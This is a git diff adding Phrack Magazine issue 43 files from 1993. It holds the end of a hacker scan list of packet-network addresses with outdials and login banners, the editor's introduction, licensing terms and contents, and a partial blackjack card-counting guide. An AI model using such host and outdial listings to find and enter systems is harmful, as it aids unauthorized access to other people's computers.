+503 120  $             outdial (503)
+503 378  *
+503 379  *
+503 476  $             access barred
+503 477  *
+503 530  *
+503 531  *
+ 
+ 
+ 
+ 
+505  -  New Mexico  Scanned: [0 - 300]      
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+505 30 
+505 153  *
+505 157  *
+505 159  *
+505 233  $             REQUESTED APPLICATION NOT DEFINED 
+ 
+ 
+ 
+ 
+509  -  Washington  Scanned: [0 - 300]      
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+509 232  $
+ 
+ 
+ 
+ 
+512  -  Texas  Scanned: [0 - 300]      
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+512 8    $             outdial (512)
+512 55   *
+512 63   *
+512 65   *
+512 136                AL /,/-   (locks up)
+512 138  *
+512 140                AL /,/-   (locks up)
+512 151  *
+512 152  *
+512 153  *
+512 253  *
+512 257    Unix        HP-UX ioi877 
+512 260  *
+512 330 
+512 331 
+ 
+ 
+ 
+ 
+513  -  Ohio  Scanned: [0 - 300+]      
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+513 30                 Lexis and Nexis
+513 31     Port Selec  MEADNET (hosts:lexis,tymnet,telenet,dialcom...)
+513 32   $             $$ 5800 LOGIN SUCCESSFUL  
+513 37   $ Prime       PRIMENET 23.3.0.r29 E03 
+513 55   $ Prime       PRIMENET 22.1.4.R30 I01
+513 57   $ Prime       PRIMENET 23.3.0.r29 E04  
+513 58   $ VAX/VMS     AEE040 is a MicroVAX 3900 
+513 66   *
+513 67   $ Prime       PRIMENET 23.3.0.r29 E01
+513 68   *
+513 69   *
+513 72   $ Prime       PRIMENET 22.1.4.R30 O1
+513 73   $ Prime       PRIMENET 22.1.4.R30 S2  
+513 75   $ Prime       PRIMENET 22.1.4.R30 T01
+513 77   $ Prime       PRIMENET 23.3.0.r29 M01
+513 78   $ Prime       PRIMENET 22.1.4.R7 A02  
+513 79   $ Prime       PRIMENET 22.1.4.R30 C2  
+513 80                 Welcome To Develnet --CL2-- Request:
+513 131                Lexis and Nexis
+513 132                Lexis and Nexis
+513 133                Lexis and Nexis
+513 134                Lexis and Nexis
+513 139                Lexis and Nexis (passthru 202365)
+513 161     VAX/VMS    AEE101
+513 165     VAX/VMS    AEE010
+513 174   *
+513 176   *
+513 230     VAX/VMS    Unison/Applied Software Designs, Inc.
+513 234   $ VAX/VMS    Continental PET Technologies, FLORENCE 
+513 236   *
+513 240   *
+ 
+ 
+ 
+ 
+515  -  Iowa  Scanned: [0 - 200]      
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+515 30                 Lexis and Nexis
+515 31                 Lexis and Nexis
+515 47   *
+ 
+ 
+ 
+ 
+516  -  New York  Scanned: [0 - 300]     
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+516 14   $             outdial (516)
+516 15   $             outdial (516)
+516 35                 CCI Multilink Services, (mail)
+516 38   *
+516 45                 Hello
+516 48.1               CUSTOMER ID:
+516 49.1               CUSTOMER ID: 
+516 140  *
+516 234  *
+ 
+ 
+ 
+ 
+518  -  New York  Scanned:[0 - 300]     
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- ------------------------------------------------- 
+518 30                 MHP201A UPK12X01 APPLICATION: 
+518 36                 MHP201A UPK12X01 APPLICATION: 
+518 230                MHP201A UPK12X01 APPLICATION: 
+518 231                MHP201A UPK12X01 APPLICATION:
+ 
+
diff --git a/phrack43/1.txt b/phrack43/1.txt
new file mode 100644
index 0000000..714ae14
--- /dev/null
+++ b/phrack43/1.txt
@@ -0,0 +1,352 @@
+                              ==Phrack Magazine==
+
+                   Volume Four, Issue Forty-Three, File 1 of 27
+
+                                 Issue 43 Index
+                              ___________________
+
+                               P H R A C K   4 3
+
+                                  July 1, 1993
+                              ___________________
+
+       ~ finger whitehouse.gov and make a secret service agent come ~
+
+
+Well, here it is:  Phrack 43.  This issue should really piss every security
+professional off.  Well, actually, none of them should ever see it because
+only two people have registered their subscriptions.
+
+But, then again I think we all know that the whole world is FULL of
+lying, thieving people who just don't care about other people's
+property.  No, smarty, not hackers...computer professionals!
+
+CASE 1:
+
+The Computer Emergency Response Team.  Bastions of life, liberty and the
+pursuit of happiness.  CERT had been on the Phrack mailing list
+previously, and was sent a copy of 42 (as was everyone) to give them
+the opportunity to subscribe.  Rather than do the right thing
+and let us at Phrack know that they were not interested in paying,
+and to take their name off the list, Ed DiHart instead forwarded off
+several copies to his cronies.
+
+Luckily for us, Ed is not the best typist, and the mail bounced all the way
+back to Phrack.  I called Ed and asked him why he would do such a thing,
+which was clearly a direct violation of US Copyright Law.  Ed claimed
+he didn't know of any new rules for Phrack, and that he had always forwarded
+off a few copies to his pals.  I told Ed that this practice was unacceptable
+and that if he wanted to continue to get Phrack he and his pals would all have
+to register their subscriptions.  Ed said that he did not want to pay
+and to take CERT off the list.
+
+A month prior to this Ed had said to me at the Computers, Freedom & Privacy
+conference in San Francisco, "Why are YOU here anyway?  It sure is IRONIC
+that someone whose goal in life was to invade other people's privacy would
+be attending a conference on protecting privacy."  I walked away from him in
+disgust.
+
+While talking to Ed about Phrack I said, "You know Ed, it sure is IRONIC
+that an organization such as CERT, whose main goal is to help protect
+the property of others would so flagrantly violate US Copyright law and
+completely disregard someone's property rights."  Man, did that feel great!
+
+
+CASE 2:
+
+BT Tymnet.  Dale Drew, security guru, made the statement on IRC about
+Phrack, "I have absolutely no desire to pay for anything having to do with
+hackers."  Later, someone from Dale's machine at BT Tymnet (opus.tymnet.com)
+logged into Len Rose's machine and ftp'd Phrack 42.  With prior knowledge
+Phrack was not free, he willingly used company property to commit a crime.
+At most companies, that is grounds for termination.  Luckily for Dale
+Tymnet doesn't give a shit.  In fact, Dale several times since has gone
+back on IRC stating, "People here are Tymnet are kind of upset about
+Phrack 42."  This just shows that people at Tymnet are just as criminal
+as they say hackers are.  Since they could care less about MY property,
+then why should I care about theirs?  Maybe I should print a list of
+all Tymnet internal NUIs!  Well, two wrongs won't make a right, so I better
+not.
+
+I did, however, send email to Dale stating that we were aware of Tymnet's
+transgressions and that we may be forced to take legal action.  I have
+decided to offer BT a sweet deal on a company-wide site license.  We
+shall see if they take me up on this offer, or continue to steal Phrack.
+
+CASE 3:
+
+Gail Thackeray.  A woman sworn by the court to uphold the laws of the
+land.  This woman had the audacity to tell me that unless I
+enforced my copyright, it was worthless.  Unless I enforce it.  What the
+hell does that mean?  Am I supposed to raid companies myself and
+go dig for evidence that they have stolen my information?  Geez...it's
+not like I'm Bellcore.  Gail's disgusting interpretation of the law,
+that unless you are big enough to stand up for yourself then you have
+no recourse, is a festering sore on the face of the American Legal system
+and I personally am appalled that this woman is allowed to act as
+a law enforcement professional.
+
+Oh well, as you can tell I've had a little fun with all this.  And I have
+effectively proven my point.  Security people, corporate professionals,
+and law enforcement types are just as unscrupulous and unethical as they
+have always claimed that we are.
+
+Only TWO PEOPLE within the computer/legal/security profession have the right
+to receive and keep copies of Phrack.  Winn Schwartau, and a man at Mitre.
+It's amazing that they are the only ones with any scruples, isn't it?
+
+Well, let's get on with the issue.  This one is pure, unadulterated evil.
+Only the strong will survive this time.  We've got Cellular, we've got
+Novell, we've got 5e, we've got PHRACK TRIVIA!  Get comfortable, grab
+your favorite intoxicant, and enjoy.
+
+*NOTES*  Some of you will recognize the 5ESS file from the Summer issue of
+2600 magazine.  This file was sent to both myself and E. Goldstein.  I
+was told by the author that 2600 was not printing it.  Wrong.  Well, we
+got permission from 2600 to print it here too since its such a good file,
+and since I spent like 8 hours dealing with the author correcting
+and editing it.  In the future gang, if you send something to Phrack AND
+to 2600, TELL US BEFOREHAND!  The last thing I want to hear is, "Phrack
+is plagiarizing 2600...gawd they are so lame."  The acronym file, you will
+note, is DIFFERENT.  Heh.
+
+In addition to the above, you may notice that we were a bit late in
+distributing this issue.  As many of you saw through the "resubscribe"
+blurb sent over the mailing list, Phrack is not going through Stormking.COM
+any longer.  The struggle to relocate put us into further delays
+but I've managed to take care of securing a new distribution site.
+We want to thank everyone at Stormking for shipping Phrack out for
+so long, and wish them the best in their future endeavors.
+
+-------------------------------------------------------------------------
+                        READ THE FOLLOWING
+
+                IMPORTANT REGISTRATION INFORMATION
+
+Corporate/Institutional/Government:  If you are a business,
+institution or government agency, or otherwise employed by,
+contracted to or providing any consultation relating to computers,
+telecommunications or security of any kind to such an entity, this
+information pertains to you.
+
+You are instructed to read this agreement and comply with its
+terms and immediately destroy any copies of this publication
+existing in your possession (electronic or otherwise) until
+such a time as you have fulfilled your registration requirements.
+A form to request registration agreements is provided
+at the end of this file.
+
+Individual User:  If you are an individual end user whose use
+is not on behalf of a business, organization or government
+agency, you may read and possess copies of Phrack Magazine
+free of charge.  You may also distribute this magazine freely
+to any other such hobbyist or computer service provided for
+similar hobbyists.  If you are unsure of your qualifications
+as an individual user, please contact us as we do not wish to
+withhold Phrack from anyone whose occupations are not in conflict
+with our readership.
+
+_______________________________________________________________
+
+Phrack Magazine corporate/institutional/government agreement
+
+   Notice to users ("Company"):  READ THE FOLLOWING LEGAL
+AGREEMENT.  Company's use and/or possession of this Magazine is
+conditioned upon compliance by company with the terms of this
+agreement.  Any continued use or possession of this Magazine is
+conditioned upon payment by company of the negotiated fee
+specified in a letter of confirmation from Phrack Magazine.
+
+   This magazine may not be distributed by Company to any
+outside corporation, organization or government agency.  This
+agreement authorizes Company to use and possess the number of copies
+described in the confirmation letter from Phrack Magazine and for which
+Company has paid Phrack Magazine the negotiated agreement fee.  If
+the confirmation letter from Phrack Magazine indicates that Company's
+agreement is "Corporate-Wide", this agreement will be deemed to cover
+copies duplicated and distributed by Company for use by any additional
+employees of Company during the Term, at no additional charge.  This
+agreement will remain in effect for one year from the date of the
+confirmation letter from Phrack Magazine authorizing such continued use
+or such other period as is stated in the confirmation letter (the "Term").
+If Company does not obtain a confirmation letter and pay the applicable
+agreement fee, Company is in violation of applicable US Copyright laws.
+
+    This Magazine is protected by United States copyright laws and
+international treaty provisions.  Company acknowledges that no title to
+the intellectual property in the Magazine is transferred to Company.
+Company further acknowledges that full ownership rights to the Magazine
+will remain the exclusive property of Phrack Magazine and Company will
+not acquire any rights to the Magazine except as expressly set
+forth in this agreement.  Company agrees that any copies of the
+Magazine made by Company will contain the same proprietary
+notices which appear in this document.
+
+    In the event of invalidity of any provision of this agreement,
+the parties agree that such invalidity shall not affect the validity
+of the remaining portions of this agreement.
+
+    In no event shall Phrack Magazine be liable for consequential, incidental
+or indirect damages of any kind arising out of the delivery, performance or
+use of the information contained within the copy of this magazine, even
+if Phrack Magazine has been advised of the possibility of such damages.
+In no event will Phrack Magazine's liability for any claim, whether in
+contract, tort, or any other theory of liability, exceed the agreement fee
+paid by Company.
+
+    This Agreement will be governed by the laws of the State of Texas
+as they are applied to agreements to be entered into and to be performed
+entirely within Texas.  The United Nations Convention on Contracts for
+the International Sale of Goods is specifically disclaimed.
+
+    This Agreement together with any Phrack Magazine
+confirmation letter constitute the entire agreement between
+Company and Phrack Magazine which supersedes any prior agreement,
+including any prior agreement from Phrack Magazine, or understanding,
+whether written or oral, relating to the subject matter of this
+Agreement.  The terms and conditions of this Agreement shall
+apply to all orders submitted to Phrack Magazine and shall supersede any
+different or additional terms on purchase orders from Company.
+
+_________________________________________________________________
+
+            REGISTRATION INFORMATION REQUEST FORM
+
+
+We have approximately __________ users.
+
+We desire Phrack Magazine distributed by (Choose one):
+
+Electronic Mail: _________
+Hard Copy:       _________
+Diskette:        _________  (Include size & computer format)
+
+
+Name:_______________________________  Dept:____________________
+
+Company:_______________________________________________________
+
+Address:_______________________________________________________
+
+_______________________________________________________________
+
+City/State/Province:___________________________________________
+
+Country/Postal Code:___________________________________________
+
+Telephone:____________________   Fax:__________________________
+
+
+Send to:
+
+Phrack Magazine
+603 W. 13th #1A-278
+Austin, TX 78701
+-----------------------------------------------------------------------------
+
+
+Enjoy the magazine.  It is for and by the hacking community.  Period.
+
+
+      Editor-In-Chief : Erik Bloodaxe (aka Chris Goggans)
+                3L33t : OMAR
+                 News : Datastream Cowboy
+          Photography : dFx
+          Pornography : Stagliano
+    Prison Consultant : Co / Dec
+          The Baddest : Dolomite
+             Rad Book : Snow Crash
+     Reasons Why I Am
+         The Way I Am : Hoffman, Hammett, The Power Computer
+               Typist : Minor Threat
+    Future Movie Star : Weevil
+   SCon Acid Casualty : Weevil
+            Thanks To : Robert Clark, Co/Dec, Spy Ace, Lex Luthor
+                        Phreak Accident, Madjus, Frosty, Synapse, Hawkwind
+                        Firm G.R.A.S.P., Aleph One, Len Rose, Seven-Up
+                        Computer Crime Laboratories
+
+"If you can take the bag off of your own head, then you haven't had
+enough nitrous."  -- KevinTX
+
+Phrack Magazine V. 4, #43, July 1, 1993.     ISSN 1068-1035
+Contents Copyright (C) 1993 Phrack Magazine, all rights reserved.
+Nothing may be reproduced in whole or in part without written
+permission of the Editor-In-Chief.  Phrack Magazine is made available
+quarterly to the amateur computer hobbyist free of charge.  Any
+corporate, government, legal, or otherwise commercial usage or
+possession (electronic or otherwise) is strictly prohibited without
+prior registration, and is in violation of applicable US Copyright laws.
+To subscribe, send email to phrack@well.sf.ca.us and ask to be added to
+the list.
+
+                    Phrack Magazine
+                    603 W. 13th #1A-278       (Phrack Mailing Address)
+                    Austin, TX 78701
+
+                    ftp.netsys.com            (Phrack FTP Site)
+                    /pub/phrack
+
+                    phrack@well.sf.ca.us      (Phrack E-mail Address)
+
+Submissions to the above email address may be encrypted
+with the following key : (Not that we use PGP or encourage its
+use or anything.  Heavens no.  That would be politically-incorrect.
+Maybe someone else is decrypting our mail for us on another machine
+that isn't used for Phrack publication.  Yeah, that's it.   :) )
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: 2.1
+
+mQCNAiuIr00AAAEEAMPGAJ+tzwSTQBjIz/IXs155El9QW8EPyIcd7NjQ98CRgJNy
+ltY43xMKv7HveHKqJC9KqpUYWwvEBLqlZ30H3gjbChXn+suU18K6V1xRvxgy21qi
+a4/qpCMxM9acukKOWYMWA0zg+xf3WShwauFWF7btqk7GojnlY1bCD+Ag5Uf1AAUR
+tCZQaHJhY2sgTWFnYXppbmUgPHBocmFja0B3ZWxsLnNmLmNhLnVzPg==
+=q2KB
+-----END PGP PUBLIC KEY BLOCK-----
+
+
+  -= Phrack 43 =-
+ Table Of Contents
+ ~~~~~~~~~~~~~~~~~
+ 1. Introduction by The Editor                               24K
+ 2. Phrack Loopback Part I                                   38K
+ 3. Phrack Loopback Part II / Editorial                      44K
+ 4. Line Noise Part I                                        39K
+ 5. Line Noise Part II                                       43K
+ 6. Phrack Pro-Phile on Doctor Who                           15K
+ 7. Conference News Part I by Various Sources                53K
+ 8. Conference News Part II by Various Sources               58K
+ 9. How To Hack Blackjack (Part I) by Lex Luthor             52K
+10. How To Hack Blackjack (Part II) by Lex Luthor            50K
+11. Help for Verifying Novell Security by Phrack Staff       48K
+12. My Bust (Part I) by Robert Clark                         56K
+13. My Bust (Part II) by Robert Clark                        55K
+14. Playing Hide and Seek, Unix Style by Phrack Accident     31K
+15. Physical Access and Theft of PBX Systems by Co/Dec       28K
+16. Guide to the 5ESS by Firm G.R.A.S.P.                     63K
+17. Cellular Info by Madjus (N.O.D.)                         47K
+18. LODCOM BBS Archive Information                           24K
+19. LODCOM Sample Messages                                   52K
+20. Step By Step Guide To Stealing a Camaro by Spy Ace       21K
+21. Acronyms Part I by Firm G.R.A.S.P.                       50K
+22. Acronyms Part II by Firm G.R.A.S.P.                      51K
+23. Acronyms Part III by Firm G.R.A.S.P.                     45K
+24. Acronyms Part IV by Firm G.R.A.S.P.                      52K
+25. Acronyms Part V by Firm G.R.A.S.P.                       46K
+26. International Scene by Various Sources                   51K
+27. Phrack World News by Datastream Cowboy                   24K
+
+                                                    Total: 1152K
+
+     Another reason why the future is wireless.
+
+     "The CTIA recommended that the FCC require the microprocessor chip be
+     difficult to detach from the circuit board in order to prevent its
+     removal and replacement or reprogramming."
+     (Cellular Marketing, p. 18, May 1993)
+
+     "Damn, and I was hoping to replace this 8051 with a P5! HAHAHAHAHA!"
+     (Anonymous hacker-type, Tumbled Cellphone Call, 1993)
+
+_______________________________________________________________________________
diff --git a/phrack43/10.txt b/phrack43/10.txt
new file mode 100644
index 0000000..9746228
--- /dev/null
+++ b/phrack43/10.txt
@@ -0,0 +1,813 @@
+                              ==Phrack Magazine==
+
+                 Volume Four, Issue Forty-Three, File 10 of 27
+
+                            How to "Hack" BlackJack
+                                      By
+                                  Lex Luthor
+                            lex@mindvox.phantom.com
+
+                               Part 2 of 2 (50K)
+
+
+
+Card Counting:
+--------------
+
+   Card Counting? Don't you have to be some sort of mathematical genius or
+have a photographic memory to count cards? No, these are as mythical as that
+415-BUG-1111 "trace detector" number posted on all those old hacker BBSes.
+Well, you may now say, what if the casino is using 4, 6, or even 8 decks?
+Surely you can't keep track of 300+ cards! Don't sweat these details. Probably
+the hardest part about learning to play successful BlackJack has already been
+accomplished in the previous section. That is: memorizing the appropriate
+basic strategy chart. All you really need to count cards is the ability to
+count up to plus or minus twelve or so...by ONES! Of course there are more
+complicated systems but that is all you need to do for the simplest ones.
+
+   The first card counting systems were developed by our old friend Dr. Thorp.
+He determined through mathematical computation that the card that has the most
+influence on the deck being in a favorable condition (for the player) was the
+five. When the deck is low in fives, the player has a higher advantage than if
+it's sparse in any other card. Logic dictated that for a very simple card
+counting strategy, simply keep track of the abundance (or lack thereof) of
+fives. This is the basis of his "Five Count" system which was later improved
+to include tens and renamed the "Ten Count" system.
+
+   Today, there are many different card counting systems. Typically, the more
+complex a system is, the better your advantage should you master it. However,
+the difference between card counting System X and System Y is usually so small
+that ease of using the system becomes more important than gaining an
+additional .15 % advantage or whatever it is. I am going to restrict the
+discussion to a single card counting system: the high/low (also called the
+plus/minus) point count. This strategy is very easy to master. Two other
+methods that I recommend if you're serious are the Advanced Plus/Minus and the
+"Hi-Opt I" systems. The former being similar to the high/low but assigns
+fractional values to certain cards as opposed to integer values which are
+easier to add in your head. The latter method is considered one of the most
+powerful yet reasonable (with respect to complexity) counting systems of all
+time and is detailed extensively on pages 213 to 277 of [7].
+
+   The quick and dirty reason why card counting works is this: The player
+gains an advantage when a deck has a SHORTAGE of cards valued 2, 3, 4, 5, 6,
+7, 8. When a deck has a SHORTAGE of cards valued 9, 10, Ace; the player has a
+DISadvantage. If you can tell when the deck is rich in 9's, 10's, and Aces
+(ie, when you hold the advantage) you can do one of the following things:
+
+      1) Bet more money when the deck is favorable to you.
+      2) Alter your Basic Strategy play to account for the favorability
+         thereby increasing the odds of winning a particular hand.
+      3) Combine 1 & 2 by betting more AND altering Basic Strategy.
+
+   Now lets discuss the +/- Point Count. As you can see from the small chart
+below, a plus value is given to low cards, and a minus value is given to high
+cards. Notice that 7, 8, and 9 have a value of zero. This is because their
+overall effect is negligible as compared to the others. Some systems use a
+value of -2 for the Ace instead of -1 and give a value of +1 to the seven
+instead of zero. If you are using a BlackJack computer game for practice,
+check to see what card counting system(s) it uses. They should offer one of
+the above two variations. Learn that one, since it will allow you to prepare
+well for actual casino play. See the "Some Comments Regarding Computer
+BlackJack Programs for the PC" section for more on this. Now the chart:
+
+                   +-----------------------------------------+
+                   |    PLUS (+1)      ||     MINUS (-1)     |
+                   +-----------------------------------------+
+                   | 2 | 3 | 4 | 5 | 6 || 7 | 8 | 9 | 10 | A |
+                   +-----------------------------------------+
+                   | 1 | 1 | 1 | 1 | 1 || 0 | 0 | 0 | 1  | 1 |
+                   +-----------------------------------------+
+
+   As you may notice, this is a balanced system. There are 20 cards in a deck
+that are valued +1: two through six. There are 16 ten value cards and 4 Aces
+in a deck (20 total) that are valued -1. The remaining 12 cards (7, 8, 9) have
+a value of zero. At the end of a deck the count should be zero. A good drill
+to practice is to get a deck of cards, turn them over one by one, and keep
+track of the count. If you enter a game mid-way between the deck or shoe, flat
+bet until the cards are shuffled. Once the cards are shuffled commence
+counting from zero.
+
+   Lets do a quick example using ten cards. The following ten cards are shown
+in the course of a hand: A, 4, 7, 10, 10, 9, 10, 2, 10, 5. Just so no one gets
+lost, we will do one card at a time and then keep the running total: the first
+value is -1 (the Ace) & the second is +1 (the 4) = 0 (the current total hand
+count). The next card is the 7 which is zero so disregard it. The next card is
+a ten so the total count is now -1. The next card is another ten, giving a
+total count of -2. The next card is a nine which has a value of zero so ignore
+it, total count is still at -2. Next is a ten, total count is at -3. Next is
+a two which adds +1 to the minus three yielding a total of -2. A quick look at
+the next two cards shows that the two will cancel each other out (-1+1=0). So
+at the end of a hand of ten cards dealt to 2 players and the dealer, the point
+count is minus two. This provides you with the knowledge that your are at a
+slight disadvantage. Your next bet should either be the same or a unit or two
+lower.
+
+   From this example you see that it would be easier to count cards if you
+play in a "cards-up" game. That way you can see all the cards as they are
+dealt and count them as they go by. When the dealer deals fast, just count
+every two cards. You still count each card but you only add to your total
+count after every two cards since many times the two values will cancel each
+other out to give a net value of zero, which doesn't need to be added to your
+total. If you play in a cards-down game, you may want to consider playing at
+third base. The reason being is that in a cards-down game you only see the
+other players' cards:
+
+ a) if you peek at their hand (not polite but it's not cheating like in poker)
+ b) if a player busts
+ c) when the dealer settles each players' hand.
+
+   When there are other people at a table, all this happens rather quickly and
+you may miss a few cards here and there which essentially invalidates your
+count. You can't control how fast the dealer deals, but you can slow things
+down when the dealer prompts you for a play decision.
+
+   I am not going to discuss changing basic strategy here. The chart you
+memorize in Basic Strategy section of this file will be fine for now. If you
+are already adept at the plus/minus count then find a book that has a complete
+system including the appropriate changes to Basic Strategy that reflect the
+current running and/or true count.
+
+   For one deck, alter your wager according to the following table:
+
+                        BET UNITS   +/- Running Count
+                        -----------------------------
+                            1            +1 or less
+                            2            +2 or +3
+                            3            +4 or +5
+                            4            +6 or +7
+                            5            +8 or more
+
+   Example: After the first hand of a one deck game, the point count is plus
+four and you just bet a $5.00 chip. Before the next hand is dealt, wager
+$15.00 (three units of $5.00) as the above table mandates.
+
+   What if there are four, six, or more decks instead of just one? I recommend
+that you perform a "true-count" rather than trying to remember different
+betting strategies for different number of deck games. By doing a true count,
+the above table can still be used.
+
+   The True Count is found by the ensuing equation. I provide an example along
+with it for the case of having a running count of +9 with one and a half decks
+left unplayed. It doesn't matter how many decks are used, you just have to have
+a good eye at guesstimating the number of decks that are left in the shoe. I
+just measured the thickness of a deck of cards to be 5/8 (10/16) of an inch.
+Hence the thickness of a half deck is 5/16 of an inch. One and a half decks
+would be 10/16 + 10/16 + 5/16 = 25/16 or a little over an inch and a half. You
+probably see a relationship here. The number of decks is approximately equal
+to the height of the cards in inches. Easy.
+
+                             Running Count           +9
+            True Count = ----------------------  =  ----- = +6
+                          # of Decks Remaining       1.5
+
+   Looking at the table of betting units above, the proper wager would be four
+units.
+
+   If you have trouble keeping the count straight in your head, you can use
+your chips as a memory storage device. After every hand tally up the net count
+and update the running or true count by rearranging your chips. This is
+somewhat conspicuous however, and if done blatantly, may get you labeled a
+counter.
+
+   If for some reason you despise the notion of counting cards, you may want
+to pick up Reference [11], "Winning Without Counting". The author writes about
+using kinesics (body language) to help determine what the dealers' hole card
+is after checking for a Natural. He claims that certain dealers have certain
+habits as far as body language is concerned, especially when they check to see
+if they have a BlackJack. The dealer will check the hole card if he/she has a
+ten value card or an Ace as the up-card. When the hand is over you will see
+what the hole card really was. You may be able to discern a certain
+characteristic about the dealer, such as a raising of the eyebrows whenever
+the hole card is a 2-9 or perhaps a slight frown, etc. There is some
+usefulness to this method but I wouldn't rely on it very much at all. I have
+only used it for one particular situation. That being when the dealer has a
+ten up card and checks to see if the hole card is an Ace. Note that many
+dealers check the hole card very quickly and turn up just the corner of the
+card so as to prevent any of the players from seeing the card. If the hole
+card is an Ace, the dealer will turn over the card and declare a BlackJack.
+However, if the hole card is a 4, many times the dealer will double check it.
+The reason for this double take is simply that a 4 looks like an Ace from the
+corner, get a deck of cards and see for yourself. A 4 really looks like an Ace
+and vice-versa when the corner is checked in a QUICK motion. So, if you see
+the dealer double check the hole card and NOT declare a BlackJack, you can be
+fairly sure the hold card is a four, giving the dealer a total of 14. You can
+now adjust your basic strategy play accordingly. This situation has only come
+up a few times in my case, but once was when I had a $50.00 bet riding on the
+hand and I won the hand by using that additional information. Dr. Julian Braun
+has previously calculated that the player has about a 10% advantage over the
+house should he/she know what the dealer's hole card is. This is quite
+substantial. Of course you have to memorize a specific Basic Strategy chart
+for the case of knowing what the dealers' total is in order to obtain the
+maximum benefit. I haven't bothered memorizing this chart simply because it is
+a rare occurrence to know what the dealers' hole card is. If you sit down at a
+table with an inexperienced dealer, you might catch a couple more than usual,
+but I don't think it is enough to warrant the extra work unless you want to
+turn pro.
+
+   Another thing Winning Without Counting mentions is to pay attention to the
+arches and warps in the cards. Perhaps a lot of the ten value cards have a
+particular warp in them due to all those times the dealer checked for a
+BlackJack. The author claims that he has used this to his advantage. Maybe so,
+but I don't put much stock in this technique. I have enough things to worry
+about while playing.
+
+   One last thing. There is no law or rule that says a dealer cannot count
+cards. A dealer may count cards because he or she is bored but more likely is
+that the casino may encourage counting. The reason being that if the deck is
+favorable to the player, the house can know this and "shuffle up". This is
+also called preferential shuffling (a game control measure) and it vaporizes
+your advantage.
+
+
+Shuffle Tracking:
+-----------------
+
+  Shuffle What? Shuffle Tracking. This is a fairly new (15 years +/-)
+technique that has not been publicized very much. One problem with many of the
+BlackJack books out there is that they are not hip to the current game. The
+obvious reason for this is that many are old or simply re-formulate strategies
+that were invented decades ago. It's just like reading "How to Hack the Primos
+Version 18 Operating System" today. The file may be interesting, many of the
+commands may be the same, but it doesn't detail how to take advantage of, and
+subvert the CURRENT version of the OS.
+
+   The best definition I have seen is this one quoted from Reference [5]:
+"'Shuffle-tracking' is the science of following specific cards through the
+shuffling process for the purpose of either keeping them in play or cutting
+them out of play." The concept of Shuffle tracking appears to have resulted
+from bored mathematician's research and computer simulation of shuffling
+cards, a familiar theme to BlackJack you say. The main thing that I hope every
+reader gets from this section is that just because someone shuffles a deck (or
+decks) of cards does not in any way mean that the cards are "randomized". The
+methods mentioned in the two previous sections (Basic Strategy and Card
+Counting) ASSUME A RANDOM DISTRIBUTION OF CARDS! That is an important point.
+According to some authors, a single deck of cards must be shuffled twenty to
+thirty times to ensure a truly random dispersion. If a Casino is using a 6
+deck shoe, that's 120 to 180 shuffles! Obviously they aren't going to shuffle
+anywhere near that many times. But don't despair, there are some types of
+shuffles which are good, and some that are bad. In fact, if the cards were
+always randomly disbursed, then you would not be reading this section due to
+it's lack of relevance. As in the Card Counting section, I am going to
+restrict the discussion to the basics of shuffle tracking as the combination
+of references listed at the end of this section provide a complete discourse of
+the topic.
+
+   A beneficial (to the player) shuffle for a one deck game is executed by
+dividing the deck equally into 26 cards and shuffling them together a minimum
+of three times. This allows the cards to be sufficiently intermixed to yield a
+fairly random distribution. An adverse shuffle prevents the cards from mixing
+completely.
+
+   The simplest example is the Unbalanced Shuffle. As its name implies, the
+dealer breaks the deck into two unequal stacks. As an example, lets say you
+are playing two hands head on with the dealer and the last 10 cards in the
+deck are dealt. The result of the hand was that both your hands lost to the
+dealer primarily due to the high percentage of low value cards in the clump.
+Note that if you were counting, you would have bet a single unit since the
+deck was unfavorable. The dealer is now ready to shuffle the deck, and
+separates the deck into 31 cards in one stack and 21 in the other stack. The
+dealer shuffles the two stacks. If the shuffle is done from the bottom of each
+stack on up, the top ten cards of the larger stack will remain intact without
+mixing with any of the other cards. Those ten cards can remain in the order
+they were just dealt throughout the shuffle if the process of bottom to top
+shuffling is not altered. You are now asked to cut the deck. If you don't cut
+the deck, the 10 cards that were dealt last hand will be dealt as your first
+two hands. The result will be the same as your last and you will lose the two
+hands. However, if you cut the deck exactly at the end of those ten cards, you
+have just altered the future to your benefit. Those cards will now be placed at
+the bottom of the deck. Should the dealer shuffle up early, you will avoid them
+altogether. In addition, if you were keeping count, you would know that the
+deck was favorable during the first 3-4 hands since there would be an abundance
+of tens in the portion of the deck that will be played. You would accordingly
+increase you bet size to maximize your winnings.
+
+   Some dealers will unknowingly split the deck into unequal stacks. However,
+more often than not, they are REQUIRED to split the deck into unequal stacks.
+If they are required to do this, they are performing the House Shuffle. The
+casino has trained the dealer to shuffle a particular way...on purpose! Why?
+Because in the long run, the house will benefit from this because most players
+will not cut any bad clumps out of play. If you have played BlackJack in a
+casino, how much did you pay attention to the way they shuffled? Like most
+people you were probably oblivious to it, perhaps you figured that during the
+shuffle would be a good time to ask that hot waitress for another drink.
+Regardless, you now see that it may be a good idea to pay attention during the
+shuffle instead of that set of "big breastseses" as David Allen Grier says on
+the "In Living Color" TV show ;)-8-<
+
+   There are a number of shuffle methods, some of which have been labeled as:
+the "Zone Shuffle", the "Strip Shuffle", and the "Stutter Shuffle". The Zone
+Shuffle is particular to shoe games (multiple deck games) and is probably one
+of the most common shuffle methods which is why I mention it here. It is
+accomplished by splitting the shoe into 4 to 8 piles depending on the number
+of decks in the shoe. Prescribed picks from each pile are made in a very exact
+way with intermittent shuffles of each pair of half deck sized stacks. The net
+effect is a simple regrouping of the cards pretty much in the same region of
+the shoe as they were before, thereby preventing clumps of cards from being
+randomly mixed. If the dealer won 40 hands and you won 20, this trend is
+likely to continue until you are broke or until the unfavorable bias is
